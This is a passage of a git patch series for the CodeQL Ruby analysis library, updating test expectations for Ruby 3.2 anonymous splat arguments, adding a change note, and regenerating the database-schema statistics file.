| -| calls.rb:293:5:293:33 | super call to my_method | 0 | calls.rb:293:11:293:11 | 6 | -| calls.rb:293:5:293:33 | super call to my_method | 1 | calls.rb:293:14:293:14 | 7 | -| calls.rb:332:3:332:12 | super call to foo | 0 | calls.rb:332:9:332:11 | ... | +| calls.rb:290:5:290:16 | super call to my_method | 0 | calls.rb:290:11:290:16 | "blah" | +| calls.rb:291:5:291:17 | super call to my_method | 0 | calls.rb:291:11:291:11 | 1 | +| calls.rb:291:5:291:17 | super call to my_method | 1 | calls.rb:291:14:291:14 | 2 | +| calls.rb:291:5:291:17 | super call to my_method | 2 | calls.rb:291:17:291:17 | 3 | +| calls.rb:294:5:294:30 | super call to my_method | 0 | calls.rb:294:11:294:11 | 4 | +| calls.rb:294:5:294:30 | super call to my_method | 1 | calls.rb:294:14:294:14 | 5 | +| calls.rb:295:5:295:33 | super call to my_method | 0 | calls.rb:295:11:295:11 | 6 | +| calls.rb:295:5:295:33 | super call to my_method | 1 | calls.rb:295:14:295:14 | 7 | +| calls.rb:334:3:334:12 | super call to foo | 0 | calls.rb:334:9:334:11 | ... | superCallsWithBlock -| calls.rb:290:5:290:23 | super call to my_method | calls.rb:290:11:290:23 | { ... } | -| calls.rb:291:5:291:26 | super call to my_method | calls.rb:291:11:291:26 | do ... end | -| calls.rb:292:5:292:30 | super call to my_method | calls.rb:292:16:292:30 | { ... } | -| calls.rb:293:5:293:33 | super call to my_method | calls.rb:293:16:293:33 | do ... end | +| calls.rb:292:5:292:23 | super call to my_method | calls.rb:292:11:292:23 | { ... } | +| calls.rb:293:5:293:26 | super call to my_method | calls.rb:293:11:293:26 | do ... end | +| calls.rb:294:5:294:30 | super call to my_method | calls.rb:294:16:294:30 | { ... } | +| calls.rb:295:5:295:33 | super call to my_method | calls.rb:295:16:295:33 | do ... end | setterCalls -| calls.rb:314:1:314:8 | call to foo= | -| calls.rb:315:1:315:6 | call to []= | | calls.rb:316:1:316:8 | call to foo= | -| calls.rb:316:12:316:19 | call to bar= | -| calls.rb:316:22:316:27 | call to []= | -| calls.rb:317:5:317:10 | call to []= | -| calls.rb:318:1:318:10 | call to count= | -| calls.rb:319:1:319:6 | call to []= | -| calls.rb:320:1:320:32 | call to []= | +| calls.rb:317:1:317:6 | call to []= | +| calls.rb:318:1:318:8 | call to foo= | +| calls.rb:318:12:318:19 | call to bar= | +| calls.rb:318:22:318:27 | call to []= | +| calls.rb:319:5:319:10 | call to []= | +| calls.rb:320:1:320:10 | call to count= | +| calls.rb:321:1:321:6 | call to []= | +| calls.rb:322:1:322:32 | call to []= | callsWithSafeNavigationOperator -| calls.rb:362:1:362:12 | call to empty? | -| calls.rb:364:1:364:23 | call to bar | +| calls.rb:364:1:364:12 | call to empty? | +| calls.rb:366:1:366:23 | call to bar | diff --git a/ruby/ql/test/library-tests/ast/params/params.expected b/ruby/ql/test/library-tests/ast/params/params.expected index a04d4393e40..f90d5d5577b 100644 --- a/ruby/ql/test/library-tests/ast/params/params.expected +++ b/ruby/ql/test/library-tests/ast/params/params.expected @@ -37,6 +37,8 @@ idParams | params.rb:77:16:77:18 | val | val | | params.rb:81:31:81:35 | array | array | | params.rb:86:14:86:14 | x | x | +| params.rb:89:31:89:35 | array | array | +| params.rb:94:36:94:39 | hash | hash | blockParams | params.rb:46:28:46:33 | &block | block | | params.rb:62:29:62:34 | &block | block | @@ -91,6 +93,10 @@ paramsInMethods | params.rb:73:1:74:3 | method_with_nil_splat | 1 | params.rb:73:35:73:39 | **nil | HashSplatNilParameter | | params.rb:81:1:84:3 | anonymous_block_parameter | 0 | params.rb:81:31:81:35 | array | SimpleParameter | | params.rb:81:1:84:3 | anonymous_block_parameter | 1 | params.rb:81:38:81:38 | & | BlockParameter | +| params.rb:89:1:91:3 | anonymous_splat_parameter | 0 | params.rb:89:31:89:35 | array | SimpleParameter | +| params.rb:89:1:91:3 | anonymous_splat_parameter | 1 | params.rb:89:38:89:38 | * | SplatParameter | +| params.rb:94:1:96:3 | anonymous_hash_splat_parameter | 0 | params.rb:94:36:94:39 | hash | SimpleParameter | +| params.rb:94:1:96:3 | anonymous_hash_splat_parameter | 1 | params.rb:94:42:94:43 | ** | HashSplatParameter | paramsInBlocks | params.rb:9:11:11:3 | do ... end | 0 | params.rb:9:15:9:17 | key | SimpleParameter | | params.rb:9:11:11:3 | do ... end | 1 | params.rb:9:20:9:24 | value | SimpleParameter | @@ -165,3 +171,7 @@ params | params.rb:81:31:81:35 | array | 0 | SimpleParameter | | params.rb:81:38:81:38 | & | 1 | BlockParameter | | params.rb:86:14:86:14 | x | 0 | SimpleParameter | +| params.rb:89:31:89:35 | array | 0 | SimpleParameter | +| params.rb:89:38:89:38 | * | 1 | SplatParameter | +| params.rb:94:36:94:39 | hash | 0 | SimpleParameter | +| params.rb:94:42:94:43 | ** | 1 | HashSplatParameter | diff --git a/ruby/ql/test/library-tests/controlflow/graph/Cfg.expected b/ruby/ql/test/library-tests/controlflow/graph/Cfg.expected index 4ba190343a7..bb43be4a082 100644 --- a/ruby/ql/test/library-tests/controlflow/graph/Cfg.expected +++ b/ruby/ql/test/library-tests/controlflow/graph/Cfg.expected @@ -3737,12 +3737,12 @@ cfg.rb: #-----| -> exit do ... end # 208| elem -#-----| -> * +#-----| -> __synth__0 -# 208| * -#-----| -> ** +# 208| __synth__0 +#-----| -> __synth__0 -# 208| ** +# 208| __synth__0 #-----| -> elem # 209| elem diff --git a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.expected b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.expected index 02cb4404d89..6f6621d830a 100644 --- a/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.expected +++ b/ruby/ql/test/query-tests/diagnostics/ExtractionErrors.expected @@ -1,4 +1,3 @@ | src/not_ruby.rb:5:25:5:26 | parse error | Extraction failed in src/not_ruby.rb with error parse error | 2 | | src/unsupported_feature.rb:2:1:2:4 | parse error | Extraction failed in src/unsupported_feature.rb with error parse error | 2 | -| src/unsupported_feature.rb:3:7:3:7 | parse error | Extraction failed in src/unsupported_feature.rb with error parse error | 2 | -| src/unsupported_feature.rb:3:14:3:14 | parse error | Extraction failed in src/unsupported_feature.rb with error parse error | 2 | +| src/unsupported_feature.rb:3:1:3:8 | parse error | Extraction failed in src/unsupported_feature.rb with error parse error | 2 | From 28c9b52dcedc25029fca335584e779f9ca1d80be Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Wed, 11 Jan 2023 12:37:18 +0100 Subject: [PATCH 268/381] Ruby: add change note --- .../lib/change-notes/2023-01-11-anonymous-splat-arguments.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 ruby/ql/lib/change-notes/2023-01-11-anonymous-splat-arguments.md diff --git a/ruby/ql/lib/change-notes/2023-01-11-anonymous-splat-arguments.md b/ruby/ql/lib/change-notes/2023-01-11-anonymous-splat-arguments.md new file mode 100644 index 00000000000..8fc5dab45ee --- /dev/null +++ b/ruby/ql/lib/change-notes/2023-01-11-anonymous-splat-arguments.md @@ -0,0 +1,4 @@ +--- + category: minorAnalysis +--- + * Ruby 3.2: anonymous rest and keyword rest arguments can now be passed as arguments, instead of just used in method parameters. From dc6f5f60d1d7f1358aeab40f0a7fc93d9ecc1e5e Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Thu, 12 Jan 2023 11:10:19 +0100 Subject: [PATCH 269/381] Ruby: update stats --- ruby/ql/lib/ruby.dbscheme.stats | 7617 ++++++++++++++++--------------- 1 file changed, 3873 insertions(+), 3744 deletions(-) diff --git a/ruby/ql/lib/ruby.dbscheme.stats b/ruby/ql/lib/ruby.dbscheme.stats index 4a594923a20..f9ee9098f5f 100644 --- a/ruby/ql/lib/ruby.dbscheme.stats +++ b/ruby/ql/lib/ruby.dbscheme.stats @@ -5,7 +5,7 @@ @diagnostic_error - 130 + 158 @diagnostic_info @@ -21,7 +21,7 @@ @erb_directive - 1400 + 1270 @erb_graphql_directive @@ -29,19 +29,19 @@ @erb_output_directive - 3859 + 3654 @erb_reserved_word - 10520 + 9848 @erb_template - 1540 + 1535 @erb_token_code - 5260 + 4924 @erb_token_comment @@ -49,23 +49,23 @@ @erb_token_content - 5478 + 5126 @file - 17206 + 17494 @folder - 4799 + 4887 @location_default - 8706731 + 8853208 @ruby_alias - 1264 + 1294 @ruby_alternative_pattern @@ -73,15 +73,15 @@ @ruby_argument_list - 670202 + 681897 @ruby_array - 246221 + 247148 @ruby_array_pattern - 0 + 5 @ruby_as_pattern @@ -89,211 +89,211 @@ @ruby_assignment - 131940 + 134532 @ruby_bare_string - 11622 + 11962 @ruby_bare_symbol - 2085 + 8244 @ruby_begin - 2549 + 2574 @ruby_begin_block - 11 + 10 @ruby_binary_ampersand - 491 + 499 @ruby_binary_ampersandampersand - 8705 + 8281 @ruby_binary_and - 1182 + 1223 @ruby_binary_bangequal - 1584 + 1487 @ruby_binary_bangtilde - 177 + 176 @ruby_binary_caret - 157 + 160 @ruby_binary_equalequal - 31539 + 32364 @ruby_binary_equalequalequal - 631 + 653 @ruby_binary_equaltilde - 1804 + 1805 @ruby_binary_langle - 1327 + 1201 @ruby_binary_langleequal - 377 + 387 @ruby_binary_langleequalrangle - 758 + 774 @ruby_binary_langlelangle - 10536 + 10576 @ruby_binary_minus - 2409 + 2459 @ruby_binary_or - 622 + 632 @ruby_binary_percent - 1017 + 1031 @ruby_binary_pipe - 969 + 988 @ruby_binary_pipepipe - 7935 + 7549 @ruby_binary_plus - 6173 + 6303 @ruby_binary_rangle - 2374 + 2230 @ruby_binary_rangleequal - 575 + 581 @ruby_binary_ranglerangle - 231 + 233 @ruby_binary_slash - 1257 + 1254 @ruby_binary_star - 3328 + 3440 @ruby_binary_starstar - 1332 + 1346 @ruby_block - 98296 + 99790 @ruby_block_argument - 6115 + 6295 @ruby_block_body - 97983 + 99474 @ruby_block_parameter - 2442 + 2508 @ruby_block_parameters - 23772 + 24260 @ruby_body_statement - 201560 + 204719 @ruby_break - 3355 + 3367 @ruby_call - 974897 + 991255 @ruby_case__ - 1224 + 1238 @ruby_case_match - 0 + 5 @ruby_chained_string - 877 + 874 @ruby_class - 16946 + 17072 @ruby_complex - 53 + 62 @ruby_conditional - 3495 + 2972 @ruby_delimited_symbol - 1264 + 1269 @ruby_destructured_left_assignment - 108 + 107 @ruby_destructured_parameter - 198 + 197 @ruby_do - 1632 + 1657 @ruby_do_block - 138119 + 140379 @ruby_element_reference - 82869 + 81544 @ruby_else - 7138 + 7283 @ruby_elsif - 1578 + 1532 @ruby_end_block @@ -301,15 +301,15 @@ @ruby_ensure - 3803 + 3901 @ruby_exception_variable - 991 + 938 @ruby_exceptions - 1654 + 1986 @ruby_expression_reference_pattern @@ -321,91 +321,91 @@ @ruby_for - 162 + 159 @ruby_hash - 39640 + 40469 @ruby_hash_pattern - 0 + 6 @ruby_hash_splat_argument - 1857 + 1859 @ruby_hash_splat_parameter - 1447 + 1485 @ruby_heredoc_body - 5789 + 6166 @ruby_if - 18341 + 16592 @ruby_if_guard - 0 + 3 @ruby_if_modifier - 13708 + 14603 @ruby_in - 162 + 159 @ruby_in_clause - 0 + 9 @ruby_interpolation - 38051 + 38064 @ruby_keyword_parameter - 3939 + 4092 @ruby_keyword_pattern - 0 + 15 @ruby_lambda - 7557 + 7711 @ruby_lambda_parameters - 1665 + 1667 @ruby_left_assignment_list - 2910 + 2979 @ruby_method - 99525 + 100650 @ruby_method_parameters - 29417 + 29981 @ruby_module - 21589 + 21842 @ruby_next - 2021 + 1898 @ruby_operator_assignment_ampersandampersandequal - 88 + 90 @ruby_operator_assignment_ampersandequal @@ -421,7 +421,7 @@ @ruby_operator_assignment_minusequal - 294 + 293 @ruby_operator_assignment_percentequal @@ -429,15 +429,15 @@ @ruby_operator_assignment_pipeequal - 142 + 154 @ruby_operator_assignment_pipepipeequal - 4545 + 4306 @ruby_operator_assignment_plusequal - 1732 + 1620 @ruby_operator_assignment_ranglerangleequal @@ -449,7 +449,7 @@ @ruby_operator_assignment_starequal - 50 + 51 @ruby_operator_assignment_starstarequal @@ -457,11 +457,11 @@ @ruby_optional_parameter - 6540 + 6579 @ruby_pair - 237637 + 242198 @ruby_parenthesized_pattern @@ -469,51 +469,51 @@ @ruby_parenthesized_statements - 10510 + 10729 @ruby_pattern - 3918 + 3935 @ruby_program - 17193 + 17468 @ruby_range_dotdot - 2976 + 3047 @ruby_range_dotdotdot - 1459 + 1535 @ruby_rational - 124 + 131 @ruby_redo - 33 + 34 @ruby_regex - 13096 + 13149 @ruby_rescue - 2085 + 2410 @ruby_rescue_modifier - 519 + 450 @ruby_reserved_word - 3700878 + 3756662 @ruby_rest_assignment - 399 + 400 @ruby_retry @@ -521,75 +521,75 @@ @ruby_return - 8486 + 8257 @ruby_right_assignment_list - 1274 + 1235 @ruby_scope_resolution - 81024 + 82269 @ruby_setter - 601 + 630 @ruby_singleton_class - 635 + 642 @ruby_singleton_method - 6692 + 6536 @ruby_splat_argument - 3093 + 3130 @ruby_splat_parameter - 2978 + 3042 @ruby_string__ - 476418 + 481711 @ruby_string_array - 3913 + 4022 @ruby_subshell - 393 + 404 @ruby_superclass - 13378 + 13470 @ruby_symbol_array - 460 + 2256 @ruby_then - 24194 + 22782 @ruby_token_character - 439 + 434 @ruby_token_class_variable - 858 + 869 @ruby_token_comment - 182145 + 185778 @ruby_token_constant - 285989 + 289023 @ruby_token_empty_statement @@ -601,11 +601,11 @@ @ruby_token_escape_sequence - 76101 + 77521 @ruby_token_false - 17332 + 17316 @ruby_token_file @@ -613,23 +613,23 @@ @ruby_token_float - 7894 + 8049 @ruby_token_forward_argument - 71 + 74 @ruby_token_forward_parameter - 111 + 117 @ruby_token_global_variable - 7235 + 7270 @ruby_token_hash_key_symbol - 231030 + 235506 @ruby_token_hash_splat_nil @@ -637,27 +637,27 @@ @ruby_token_heredoc_beginning - 5789 + 6165 @ruby_token_heredoc_content - 12722 + 12972 @ruby_token_heredoc_end - 5789 + 6166 @ruby_token_identifier - 1498233 + 1523871 @ruby_token_instance_variable - 84088 + 85860 @ruby_token_integer - 300415 + 303067 @ruby_token_line @@ -665,31 +665,31 @@ @ruby_token_nil - 18114 + 18431 @ruby_token_operator - 803 + 839 @ruby_token_self - 13236 + 13535 @ruby_token_simple_symbol - 252789 + 257269 @ruby_token_string_content - 491238 + 497490 @ruby_token_super - 5049 + 5161 @ruby_token_true - 23791 + 23898 @ruby_token_uninterpreted @@ -697,23 +697,23 @@ @ruby_unary_bang - 5826 + 5820 @ruby_unary_definedquestion - 1320 + 1334 @ruby_unary_minus - 9472 + 9433 @ruby_unary_not - 190 + 189 @ruby_unary_plus - 1416 + 1420 @ruby_unary_tilde @@ -725,23 +725,23 @@ @ruby_unless - 2594 + 2625 @ruby_unless_guard - 0 + 1 @ruby_unless_modifier - 4163 + 3688 @ruby_until - 121 + 123 @ruby_until_modifier - 223 + 226 @ruby_variable_reference_pattern @@ -749,32 +749,32 @@ @ruby_when - 3248 + 3289 @ruby_while - 1349 + 1375 @ruby_while_modifier - 190 + 193 @ruby_yield - 2389 + 2452 containerparent - 21979 + 22355 parent - 4799 + 4887 child - 21979 + 22355 @@ -788,37 +788,37 @@ 1 2 - 2145 + 2186 2 3 - 910 + 948 3 4 - 442 + 421 4 5 - 299 + 316 5 7 - 377 + 382 7 13 - 390 + 395 13 124 - 234 + 237 @@ -834,7 +834,7 @@ 1 2 - 21979 + 22355 @@ -844,11 +844,11 @@ diagnostics - 130 + 158 id - 130 + 158 severity @@ -864,11 +864,11 @@ full_error_message - 104 + 118 location - 130 + 158 @@ -882,7 +882,7 @@ 1 2 - 130 + 158 @@ -898,7 +898,7 @@ 1 2 - 130 + 158 @@ -914,7 +914,7 @@ 1 2 - 130 + 158 @@ -930,7 +930,7 @@ 1 2 - 130 + 158 @@ -946,7 +946,7 @@ 1 2 - 130 + 158 @@ -960,8 +960,8 @@ 12 - 10 - 11 + 12 + 13 13 @@ -1007,123 +1007,6 @@ 12 - - 8 - 9 - 13 - - - - - - - severity - location - - - 12 - - - 10 - 11 - 13 - - - - - - - error_tag - id - - - 12 - - - 10 - 11 - 13 - - - - - - - error_tag - severity - - - 12 - - - 1 - 2 - 13 - - - - - - - error_tag - error_message - - - 12 - - - 2 - 3 - 13 - - - - - - - error_tag - full_error_message - - - 12 - - - 8 - 9 - 13 - - - - - - - error_tag - location - - - 12 - - - 10 - 11 - 13 - - - - - - - error_message - id - - - 12 - - - 1 - 2 - 13 - 9 10 @@ -1134,7 +1017,39 @@ - error_message + severity + location + + + 12 + + + 12 + 13 + 13 + + + + + + + error_tag + id + + + 12 + + + 12 + 13 + 13 + + + + + + + error_tag severity @@ -1143,61 +1058,35 @@ 1 2 - 26 + 13 - error_message - error_tag + error_tag + error_message 12 - 1 - 2 - 26 + 2 + 3 + 13 - error_message + error_tag full_error_message 12 - - 1 - 2 - 13 - - - 7 - 8 - 13 - - - - - - - error_message - location - - - 12 - - - 1 - 2 - 13 - 9 10 @@ -1207,6 +1096,117 @@ + + error_tag + location + + + 12 + + + 12 + 13 + 13 + + + + + + + error_message + id + + + 12 + + + 1 + 2 + 13 + + + 11 + 12 + 13 + + + + + + + error_message + severity + + + 12 + + + 1 + 2 + 26 + + + + + + + error_message + error_tag + + + 12 + + + 1 + 2 + 26 + + + + + + + error_message + full_error_message + + + 12 + + + 1 + 2 + 13 + + + 8 + 9 + 13 + + + + + + + error_message + location + + + 12 + + + 1 + 2 + 13 + + + 11 + 12 + 13 + + + + + full_error_message id @@ -1217,12 +1217,12 @@ 1 2 - 78 + 79 2 3 - 26 + 39 @@ -1238,7 +1238,7 @@ 1 2 - 104 + 118 @@ -1254,7 +1254,7 @@ 1 2 - 104 + 118 @@ -1270,7 +1270,7 @@ 1 2 - 104 + 118 @@ -1286,12 +1286,12 @@ 1 2 - 78 + 79 2 3 - 26 + 39 @@ -1307,7 +1307,7 @@ 1 2 - 130 + 158 @@ -1323,7 +1323,7 @@ 1 2 - 130 + 158 @@ -1339,7 +1339,7 @@ 1 2 - 130 + 158 @@ -1355,7 +1355,7 @@ 1 2 - 130 + 158 @@ -1371,7 +1371,7 @@ 1 2 - 130 + 158 @@ -1381,23 +1381,23 @@ erb_ast_node_info - 26945 + 25211 node - 26945 + 25211 parent - 6111 + 5698 parent_index - 688 + 623 loc - 26942 + 25208 @@ -1411,7 +1411,7 @@ 1 2 - 26945 + 25211 @@ -1427,7 +1427,7 @@ 1 2 - 26945 + 25211 @@ -1443,7 +1443,7 @@ 1 2 - 26945 + 25211 @@ -1459,17 +1459,17 @@ 1 3 - 446 + 397 3 4 - 5403 + 5054 4 - 237 - 262 + 236 + 246 @@ -1485,17 +1485,17 @@ 1 3 - 446 + 397 3 4 - 5403 + 5054 4 - 237 - 262 + 236 + 246 @@ -1511,17 +1511,17 @@ 1 3 - 446 + 397 3 4 - 5403 + 5054 4 - 237 - 262 + 236 + 246 @@ -1537,62 +1537,62 @@ 1 2 - 2 + 23 2 3 - 134 + 98 3 4 - 43 + 2 4 5 - 75 + 106 5 6 - 61 + 55 6 7 - 70 + 53 7 - 9 - 61 + 8 + 45 - 10 - 16 + 8 + 14 + 53 + + + 14 + 23 55 - - 16 - 23 - 52 - 23 - 43 - 52 + 38 + 47 - 45 - 71 - 52 + 39 + 62 + 47 - 73 - 2096 - 26 + 65 + 2150 + 34 @@ -1608,62 +1608,62 @@ 1 2 - 2 + 23 2 3 - 134 + 98 3 4 - 43 + 2 4 5 - 75 + 106 5 6 - 61 + 55 6 7 - 70 + 53 7 - 9 - 61 + 8 + 45 - 10 - 16 + 8 + 14 + 53 + + + 14 + 23 55 - - 16 - 23 - 52 - 23 - 43 - 52 + 38 + 47 - 45 - 71 - 52 + 39 + 62 + 47 - 73 - 2096 - 26 + 65 + 2150 + 34 @@ -1679,62 +1679,62 @@ 1 2 - 2 + 23 2 3 - 134 + 98 3 4 - 43 + 2 4 5 - 75 + 106 5 6 - 61 + 55 6 7 - 70 + 53 7 - 9 - 61 + 8 + 45 - 10 - 16 + 8 + 14 + 53 + + + 14 + 23 55 - - 16 - 23 - 52 - 23 - 43 - 52 + 38 + 47 - 45 - 71 - 52 + 39 + 62 + 47 - 73 - 2095 - 26 + 65 + 2149 + 34 @@ -1750,7 +1750,7 @@ 1 2 - 26939 + 25205 2 @@ -1771,7 +1771,7 @@ 1 2 - 26939 + 25205 2 @@ -1792,7 +1792,7 @@ 1 2 - 26942 + 25208 @@ -1861,15 +1861,15 @@ erb_directive_child - 1400 + 1270 erb_directive - 1400 + 1270 child - 1400 + 1270 @@ -1883,7 +1883,7 @@ 1 2 - 1400 + 1270 @@ -1899,7 +1899,7 @@ 1 2 - 1400 + 1270 @@ -1909,11 +1909,11 @@ erb_directive_def - 1400 + 1270 id - 1400 + 1270 @@ -1979,15 +1979,15 @@ erb_output_directive_child - 3859 + 3654 erb_output_directive - 3859 + 3654 child - 3859 + 3654 @@ -2001,7 +2001,7 @@ 1 2 - 3859 + 3654 @@ -2017,7 +2017,7 @@ 1 2 - 3859 + 3654 @@ -2027,30 +2027,30 @@ erb_output_directive_def - 3859 + 3654 id - 3859 + 3654 erb_template_child - 10739 + 10050 erb_template - 425 + 387 index - 688 + 623 child - 10739 + 10050 @@ -2064,57 +2064,57 @@ 1 3 - 20 + 10 3 4 - 142 + 129 4 7 - 26 + 23 7 10 - 32 + 29 10 14 - 32 + 31 14 - 24 - 32 + 23 + 29 - 24 - 32 - 35 + 23 + 30 + 29 - 33 - 42 - 35 + 31 + 38 + 29 - 43 - 68 - 32 + 39 + 59 + 29 - 70 - 190 - 32 + 63 + 108 + 29 - 235 - 237 - 5 + 127 + 236 + 15 @@ -2130,57 +2130,57 @@ 1 3 - 20 + 10 3 4 - 142 + 129 4 7 - 26 + 23 7 10 - 32 + 29 10 14 - 32 + 31 14 - 24 - 32 + 23 + 29 - 24 - 32 - 35 + 23 + 30 + 29 - 33 - 42 - 35 + 31 + 38 + 29 - 43 - 68 - 32 + 39 + 59 + 29 - 70 - 190 - 32 + 63 + 108 + 29 - 235 - 237 - 5 + 127 + 236 + 15 @@ -2196,62 +2196,62 @@ 1 2 - 2 + 23 2 3 - 134 + 98 3 4 - 43 + 2 4 5 - 75 + 106 5 6 - 61 + 55 6 7 - 70 + 53 7 - 9 - 61 + 8 + 45 - 10 - 16 + 8 + 14 + 53 + + + 14 + 23 55 - - 16 - 23 - 52 - 23 - 43 - 52 + 38 + 47 - 45 - 71 - 52 + 39 + 62 + 47 - 73 + 65 147 - 26 + 34 @@ -2267,62 +2267,62 @@ 1 2 - 2 + 23 2 3 - 134 + 98 3 4 - 43 + 2 4 5 - 75 + 106 5 6 - 61 + 55 6 7 - 70 + 53 7 - 9 - 61 + 8 + 45 - 10 - 16 + 8 + 14 + 53 + + + 14 + 23 55 - - 16 - 23 - 52 - 23 - 43 - 52 + 38 + 47 - 45 - 71 - 52 + 39 + 62 + 47 - 73 + 65 147 - 26 + 34 @@ -2338,7 +2338,7 @@ 1 2 - 10739 + 10050 @@ -2354,7 +2354,7 @@ 1 2 - 10739 + 10050 @@ -2364,30 +2364,30 @@ erb_template_def - 1540 + 1535 id - 1540 + 1535 erb_tokeninfo - 21259 + 19899 id - 21259 + 19899 kind - 8 + 7 value - 5773 + 5441 @@ -2401,7 +2401,7 @@ 1 2 - 21259 + 19899 @@ -2417,7 +2417,7 @@ 1 2 - 21259 + 19899 @@ -2431,18 +2431,18 @@ 12 - 1803 - 1804 + 1857 + 1858 2 - 1878 - 1879 + 1933 + 1934 2 - 3606 - 3607 + 3714 + 3715 2 @@ -2462,13 +2462,13 @@ 2 - 932 - 933 + 972 + 973 2 - 1042 - 1043 + 1075 + 1076 2 @@ -2485,17 +2485,17 @@ 1 2 - 4667 + 4402 2 3 - 679 + 647 3 - 1742 - 425 + 1790 + 392 @@ -2511,7 +2511,7 @@ 1 2 - 5773 + 5441 @@ -2521,15 +2521,15 @@ files - 17206 + 17494 id - 17206 + 17494 name - 17206 + 17494 @@ -2543,7 +2543,7 @@ 1 2 - 17206 + 17494 @@ -2559,7 +2559,7 @@ 1 2 - 17206 + 17494 @@ -2569,15 +2569,15 @@ folders - 4799 + 4887 id - 4799 + 4887 name - 4799 + 4887 @@ -2591,7 +2591,7 @@ 1 2 - 4799 + 4887 @@ -2607,7 +2607,7 @@ 1 2 - 4799 + 4887 @@ -2617,31 +2617,31 @@ locations_default - 8706731 + 8853208 id - 8706731 + 8853208 file - 17206 + 17494 start_line - 30719 + 31169 start_column - 5072 + 5190 end_line - 30719 + 31169 end_column - 5163 + 5295 @@ -2655,7 +2655,7 @@ 1 2 - 8706731 + 8853208 @@ -2671,7 +2671,7 @@ 1 2 - 8706731 + 8853208 @@ -2687,7 +2687,7 @@ 1 2 - 8706731 + 8853208 @@ -2703,7 +2703,7 @@ 1 2 - 8706731 + 8853208 @@ -2719,7 +2719,7 @@ 1 2 - 8706731 + 8853208 @@ -2735,67 +2735,72 @@ 1 32 - 1300 + 1343 32 49 - 1339 + 1317 49 - 73 - 1482 + 72 + 1330 - 73 - 95 - 1352 + 72 + 94 + 1330 - 95 - 126 - 1313 + 94 + 121 + 1383 - 127 - 170 - 1313 + 121 + 165 + 1343 - 170 - 218 - 1339 + 165 + 214 + 1317 - 218 - 277 - 1326 + 214 + 265 + 1317 - 277 - 359 - 1300 + 265 + 339 + 1317 - 361 - 489 - 1300 + 339 + 455 + 1317 - 492 - 736 - 1313 + 455 + 686 + 1317 - 741 - 1508 - 1300 + 686 + 1221 + 1317 - 1509 - 22819 - 1222 + 1228 + 4893 + 1317 + + + 4963 + 22841 + 223 @@ -2810,68 +2815,68 @@ 1 - 8 - 1586 + 7 + 1146 - 8 - 11 - 1443 + 7 + 10 + 1554 - 11 - 14 - 1521 + 10 + 13 + 1422 - 14 - 17 - 1430 + 13 + 16 + 1528 - 17 - 21 - 1417 + 16 + 20 + 1541 - 21 - 26 - 1352 + 20 + 25 + 1409 - 26 - 32 - 1378 + 25 + 31 + 1488 - 32 - 39 - 1378 + 31 + 38 + 1370 - 39 - 51 - 1417 + 38 + 49 + 1462 - 51 - 75 - 1326 + 49 + 69 + 1356 - 75 - 126 - 1313 + 69 + 116 + 1317 - 126 - 343 - 1300 + 116 + 248 + 1317 - 354 - 2337 - 338 + 253 + 2339 + 579 @@ -2887,67 +2892,67 @@ 1 16 - 1404 + 1435 16 25 - 1417 + 1422 25 32 - 1378 + 1396 32 41 - 1391 + 1422 41 47 - 1495 + 1501 47 54 - 1547 + 1580 54 62 - 1339 + 1383 62 69 - 1391 + 1396 69 77 - 1443 + 1435 77 - 87 - 1365 + 86 + 1330 - 87 - 101 - 1326 + 86 + 99 + 1330 - 101 - 129 - 1313 + 99 + 124 + 1317 - 129 + 125 357 - 390 + 540 @@ -2963,67 +2968,67 @@ 1 8 - 1547 + 1580 8 11 - 1430 + 1449 11 14 - 1547 + 1580 14 17 - 1430 + 1435 17 21 - 1430 + 1435 21 26 - 1365 + 1383 26 32 - 1378 + 1422 32 39 - 1378 + 1422 39 51 - 1417 + 1422 51 75 - 1326 + 1356 75 126 - 1313 + 1343 126 343 - 1300 + 1317 354 - 2337 - 338 + 2339 + 342 @@ -3039,67 +3044,67 @@ 1 20 - 1430 + 1475 20 - 28 - 1300 + 29 + 1383 - 28 + 29 36 - 1404 + 1343 36 45 - 1365 + 1383 45 50 - 1313 + 1317 50 57 - 1352 + 1370 57 64 - 1339 + 1396 64 71 - 1300 + 1317 71 78 - 1391 + 1370 78 - 87 - 1443 + 86 + 1330 - 87 - 99 - 1417 + 86 + 97 + 1449 - 99 - 120 - 1365 + 97 + 116 + 1356 - 120 + 116 367 - 780 + 1001 @@ -3115,72 +3120,72 @@ 1 2 - 1430 + 1567 2 - 4 - 1716 + 5 + 1620 5 6 - 3316 + 3411 6 10 - 2523 + 2634 10 - 16 - 2367 + 17 + 2832 - 16 - 22 - 2562 + 17 + 24 + 2410 - 22 - 37 - 2327 + 24 + 40 + 2397 - 37 - 68 - 2341 + 40 + 74 + 2358 - 68 - 110 - 2314 + 74 + 117 + 2384 - 110 - 161 - 2314 + 117 + 174 + 2358 - 161 - 249 - 2314 + 174 + 271 + 2371 - 250 - 596 - 2314 + 272 + 771 + 2344 - 601 - 3089 - 2314 + 788 + 7483 + 2344 - 3257 - 10293 - 559 + 7733 + 10342 + 131 @@ -3196,47 +3201,47 @@ 1 2 - 9884 + 10091 2 3 - 5605 + 5651 3 6 - 2341 + 2384 6 9 - 2341 + 2410 9 14 - 2419 + 2410 14 22 - 2484 + 2463 22 - 49 - 2327 + 47 + 2344 - 49 - 220 - 2314 + 47 + 207 + 2358 - 223 - 1323 - 1001 + 215 + 1328 + 1053 @@ -3252,419 +3257,79 @@ 1 2 - 1430 + 1567 2 3 - 1495 + 1514 3 4 - 2510 + 2344 4 6 - 2419 + 2595 6 8 - 1573 - - - 8 - 12 - 2393 - - - 12 - 16 - 2432 - - - 16 - 25 - 2549 - - - 25 - 39 - 2314 - - - 39 - 53 - 2406 - - - 53 - 66 - 2314 - - - 66 - 81 - 2314 - - - 81 - 104 - 2341 - - - 104 - 205 - 2223 - - - - - - - start_line - end_line - - - 12 - - - 1 - 2 - 11106 - - - 2 - 3 - 6294 - - - 3 - 4 - 2275 - - - 4 - 5 - 1547 - - - 5 - 7 - 2653 - - - 7 - 10 - 2432 - - - 10 - 18 - 2536 - - - 18 - 241 - 1872 - - - - - - - start_line - end_column - - - 12 - - - 1 - 2 - 1430 - - - 2 - 4 - 1742 - - - 4 - 5 - 3407 - - - 5 - 8 - 2757 + 1765 8 13 - 2822 + 2713 13 - 18 - 2562 - - - 18 - 28 - 2445 - - - 28 - 44 - 2367 - - - 44 - 59 - 